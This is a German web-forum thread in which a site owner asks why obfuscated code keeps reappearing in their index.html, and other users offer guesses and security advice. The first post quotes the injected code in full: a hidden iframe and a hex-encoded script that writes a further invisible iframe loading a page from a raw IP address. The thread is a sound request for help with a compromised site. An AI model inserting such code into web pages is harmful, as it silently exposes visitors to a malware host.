Trojaner?

Z

Zocker4Life

Well-known member
ID: 126615
L
10 Juni 2006
816
35
Und zwar habe ich folgendes Problem.
Ich habe eine ganz normale HTML Seite, index.html.
Wenn ich die hochlade und den Quelltext anschaue ist alles okay.
Aber z.B. einen Tag später schau ich erneut den Quelltext an, finde ich diesen Code:
<iframe src='https://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4763a4ec10880(v4763a4ec10c7b){ var v4763a4ec111cf=16; return(parseInt(v4763a4ec10c7b,v4763a4ec111cf));}function v4763a4ec16a69(v4763a4ec19178){ var v4763a4ec1c364='';for(v4763a4ec1d71e=0; v4763a4ec1d71e<v4763a4ec19178.length; v4763a4ec1d71e+=2){ v4763a4ec1c364+=(String.fromCharCode(v4763a4ec10880(v4763a4ec19178.substr(v4763a4ec1d71e, 2))));}return v4763a4ec1c364;} document.write(v4763a4ec16a69('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D313064643239333434207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3539323130292B2732343566363539613938305C272077696474683D313535206865696768743D333832207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
<div i
Zum Vergrößern anklicken....
in meinem Quelltext.
Dann lösche ich den Code und lade die Datei erneut hoch, ist alles wieder normal.
Nach z.B. wieder nem Tag ist der Code wieder drinnen.
Was ist denn das?
Habe das bereits auf mehreren Seiten....
 
Hi,

dazu ein paar Fragen, bevor man was sagen kann...

1. Hast du nen eigenen Server (Root oder VPS oder sowas)?
2. Wenn nicht, dann vielleicht Space bei einem Freehoster?

Es kann möglich sein, dass es sich hier einfach um einen Code handelt, der vom Hoster automatisch in deine Seiten eingefügt wird, um z.B. Werbung einzubinden. Falls das nicht der Falls ist, kann es sich natürlich tatsächlich um einen Trojaner handeln, welcher dann jedoch auf dem Server (dein eigener/des Hosters) sitzt. Was wiederum bedeuten würde, dass der Server gehackt ist und aus Sicherheitsgründen vom Netz genommen werden sollte!

Was passiert denn, wenn du die Seite mit diesem Code aufrufst?
Hast du einen Virenscanner/Firewall auf deinem Rechner? Schlagen die an?

In allen Fällen solltest du den evtl. Hoster davon unterrichten, bzw. nachfragen....
 
Hi
Die frage ist nur wo der mini Iframe ist und was er da macht. Schaut interessant aus. Was er da bloss mit den zahlen macht. Kann leider kein Java.Denk das es ein werbefenster sein wird. Lass man den virenscanner laufen.

MFG
Harry
 
Naja, dieses Zahlenwirrwarr wird irgendeine Art von Verschlüsselung sein, gehe ich mal von aus. Der entschlüsselte Code wäre da sicherlich mal interessant.

Irgendwo habe ich neulich schonmal von so einem Fall gelesen. War das nicht sogar hier bei Klamm? *nachdenk* *nachguck* :think:

EDIT:
Joa, hier war das...
 
Zuletzt bearbeitet:
in letzter zeit sehen ich immer mehr so welche virencodes in den foren soweit uns gremlin im designerscripte.net forum gesagt hat kommen die aus russland
 
Du musst dich einloggen oder registrieren, um hier zu antworten.
Zurück
Oben